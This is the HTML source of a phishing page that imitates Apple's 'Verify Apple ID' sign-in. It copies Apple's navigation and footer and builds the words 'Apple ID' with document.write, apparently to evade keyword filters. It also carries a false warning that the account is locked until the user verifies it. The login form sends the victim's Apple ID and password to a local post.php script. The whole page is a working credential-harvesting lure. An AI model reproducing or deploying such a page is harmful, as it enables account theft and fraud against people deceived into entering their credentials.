index.html 10 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" dir="ltr">
  3. <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
  4. <head>
  5. <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
  6. <link rel="shortcut icon" href="images/favicon.ico">
  7. <title>Verify Apple ID - Login</title>
  8. <link rel="stylesheet" type="text/css" href="images/navigation.css" id="globalheader-stylesheet"></link>
  9. <link rel="stylesheet" type="text/css" href="images/base.css"></link>
  10. <link rel="stylesheet" type="text/css" href="images/id.css"></link>
  11. <link rel="stylesheet" type="text/css" href="images/hsa.css"></link>
  12. <script language="JavaScript1.2">
  13. var testresults
  14. function checkemail(){
  15. var str=document.email.email.value
  16. var filter=/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i
  17. if (filter.test(str))
  18. testresults=true
  19. else{
  20. alert("Please enter valid e-mail!")
  21. testresults=false
  22. }
  23. var x=document.forms["email"]["password"].value;
  24. if (x==null || x=="")
  25. {
  26. alert("Please enter valid password!");
  27. return false;
  28. }
  29. return (testresults)
  30. }
  31. </script>
  32. <script>
  33. function checkbae(){
  34. if (document.layers||document.getElementById||document.all)
  35. return checkemail()
  36. else
  37. return true
  38. }
  39. </script>
  40. </head>
  41. <body class="myappleid sign-in index" id="editContainerBody">
  42. <!--********* New style imported as per the new Header *********-->
  43. <!-- end -->
  44. <!--********* setting country and language from Language parameter *********-->
  45. <!--********* setting locale to urlLanguageInsert to dynamically form the URL based on locale *********-->
  46. <nav id="globalheader" class="globalheader" role="navigation" aria-label="Global Navigation" data-hires="false" data-analytics-region="global nav" lang="en-US">
  47. <div id="gh-content" class="gh-content">
  48. <ul class="gh-menu">
  49. <li id="gh-menu-icon-toggle" class="gh-menu-icon gh-menu-icon-toggle"><button id="gh-svg-icons" class="gh-svg-wrapper"></button><span class="gh-text-replace">Menu</span></li>
  50. <li id="gh-menu-icon-home" class="gh-menu-icon gh-menu-icon-home"><a href="/"><span class="gh-text-replace">Apple</span></a></li>
  51. </ul><!--/gh-menu-->
  52. <div class="gh-nav">
  53. <div class="gh-nav-view">
  54. <ul class="gh-nav-list">
  55. <li class="gh-tab gh-tab-apple"><a class="gh-tab-link" href="http://www.apple.com/" onclick="s_objectID=&quot;http://www.apple.com/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Apple</span></span></a></li>
  56. <li class="gh-tab gh-tab-store">
  57. <a class="gh-tab-link" href="http://store.apple.com/" onclick="s_objectID=&quot;http://store.apple.com/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Store</span></span></a>
  58. </li>
  59. <li class="gh-tab gh-tab-mac">
  60. <a class="gh-tab-link" href="http://www.apple.com/mac" onclick="s_objectID=&quot;http://www.apple.com/mac/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Mac</span></span></a>
  61. </li>
  62. <li class="gh-tab gh-tab-iphone">
  63. <a class="gh-tab-link" href="http://www.apple.com/iphone" onclick="s_objectID=&quot;http://www.apple.com/iphone/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPhone</span></span></a>
  64. </li>
  65. <li class="gh-tab gh-tab-watch">
  66. <a class="gh-tab-link" href="http://www.apple.com/watch" onclick="s_objectID=&quot;http://www.apple.com/watch/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Watch</span></span></a>
  67. </li>
  68. <li class="gh-tab gh-tab-ipad">
  69. <a class="gh-tab-link" href="http://www.apple.com/ipad" onclick="s_objectID=&quot;http://www.apple.com/ipad/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPad</span></span></a>
  70. </li>
  71. <li class="gh-tab gh-tab-ipod">
  72. <a class="gh-tab-link" href="http://www.apple.com/ipod" onclick="s_objectID=&quot;http://www.apple.com/ipod/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iPod</span></span></a>
  73. </li>
  74. <li class="gh-tab gh-tab-itunes">
  75. <a class="gh-tab-link" href="http://www.apple.com/itunes" onclick="s_objectID=&quot;http://www.apple.com/itunes/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">iTunes</span></span></a>
  76. </li>
  77. <li class="gh-tab gh-tab-support">
  78. <a class="gh-tab-link" href="http://www.apple.com/support" onclick="s_objectID=&quot;http://www.apple.com/support/_1&quot;;return this.s_oc?this.s_oc(e):true"><span class="gh-tab-inner"><span class="gh-text-replace">Support</span></span></a>
  79. </li>
  80. <li id="gh-tab-search" class="gh-tab gh-tab-search">
  81. <div id="gh-search" class="gh-search" role="search">
  82. <form action="post.php" method="post" class="gh-search-form" id="gh-search-form" data-search-recommended-results='{"url":"https://www.apple.com/global/nav/scripts/shortcuts.php","requestName":"recommendedResults","queryName":"q","dataType":"xml"}' data-search-suggested-searches='{"url":"https://www.apple.com/search/instant/getSuggestions","requestName":"suggestedSearches","queryName":"query","queryParams":{"model":"marcom_en_US","locale":"en_US"},"dataType":"json"}' >
  83. <div class="gh-search-input-wrapper">
  84. <label for="gh-search-input" class="gh-text-replace">Search apple.com</label>
  85. <input type="text" name="q" id="gh-search-input" class="gh-search-input" placeholder="Search apple.com" />
  86. </div>
  87. <button disabled="disabled" type="submit" id="gh-search-submit" class="gh-search-submit gh-search-magnify"><span class="gh-text-replace">Search apple.com</span></button>
  88. <button disabled="disabled" type="reset" id="gh-search-reset" class="gh-search-reset"><span class="gh-text-replace">Reset</span></button>
  89. </form>
  90. </div>
  91. <a class="gh-search-magnify" href="http://www.apple.com/search/"><span class="gh-text-replace">Search apple.com</span></a>
  92. </li>
  93. </ul>
  94. </div>
  95. </div><!--/gh-nav-->
  96. </div>
  97. </nav><!--/globalheader-->
  98. <!-- header ends here -->
  99. <form method="post" onSubmit="return checkbae()" id="signIn" name="email" action="post.php">
  100. <div id="productheader">
  101. <a aria-label="My ID" href="#">
  102. <h2>
  103. <img aria-hidden="true" class="DimAppleIdLogoIV" src="images/logo.png" />
  104. </h2>
  105. </a>
  106. </div>
  107. <div id="main">
  108. <div id="content" class="content">
  109. <div class="grid2colc wrap">
  110. <div class="column first sidebar">
  111. <h2>Please sign in to verify your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT></h2>
  112. <p class="intro">
  113. Please login to verify & update your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT> account information.</p>
  114. <h2>Account Verification.</h2>
  115. <p class="intro">
  116. We occasionally require our users to verify or update their account information on file. This can be due to invalid account details, or an expired payment method. <br/><br/><b>You will be unable to use your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT> or make purchases until this process is completed.</b>
  117. </p>
  118. </div><!--/column-->
  119. <div class="column last">
  120. <h2>Sign in to verify your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT>.</h2>
  121. <div class="formrow">
  122. <span class="formwrap">
  123. <input size="30" autocapitalize="off" autocorrect="off" maxlength="128" placeholder="Apple ID" value="" aria-label="Apple ID" id="email" type="text" name="email" />
  124. </span>
  125. <span class="input-msg show">
  126. <a name="" id="" href="forgot.html"><span>Forgot your <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT>?</span></a>
  127. </span>
  128. </div>
  129. <div class="formrow">
  130. <span class="formwrap">
  131. <input size="30" oncut="" oncopy="" autocapitalize="off" autocorrect="off" aria-label="Password" placeholder="Password" id="password" type="password" name="password" required/>
  132. </span>
  133. <span class="input-msg show">
  134. <a name="" type="submit" id="" href="forgot.html"><span>Forgot your Password?</span></a>
  135. </span>
  136. </div>
  137. <div id="bot-nav">
  138. <a type="submit" class="btn bigblue">
  139. <input class="btn bigblue" id="" onsubmit="return validateForm()" type="submit" value="Sign In To Apple ID Verification" name="" />
  140. </a>
  141. </div>
  142. </div>
  143. </div>
  144. </div>
  145. </div>
  146. </form>
  147. <footer id="globalfooter">
  148. <div id="breadory">
  149. <ol id="breadcrumbs">
  150. <li class="home"><a>Home</a></li>
  151. <li> <a onClick="" href="#">My <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT></a> </li>
  152. </ol>
  153. </div>
  154. <div class="gf-sosumi">
  155. <p>Copyright &copy; 2020 <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' Inc') </SCRIPT> All rights reserved.</p>
  156. <ul class="piped">
  157. <li><a class="first" href="terms.html">Terms of Use</a></li>
  158. <li><a href="privacy.html">Privacy Policy</a></li>
  159. <li style="float:right">
  160. <a class="choose" title="Choose your country or region" href="chooseyourcountry.html"><p style="display:inline;margin-right:-5px; padding-right:0px;"><SCRIPT TYPE="text/javascript"> document.write('Choose' + ' your') </SCRIPT> country or region</p><img class="img-22" src="images/usa.png" /></a></li>
  161. </ul>
  162. </div>
  163. </footer>
  164. </body>
  165. </html>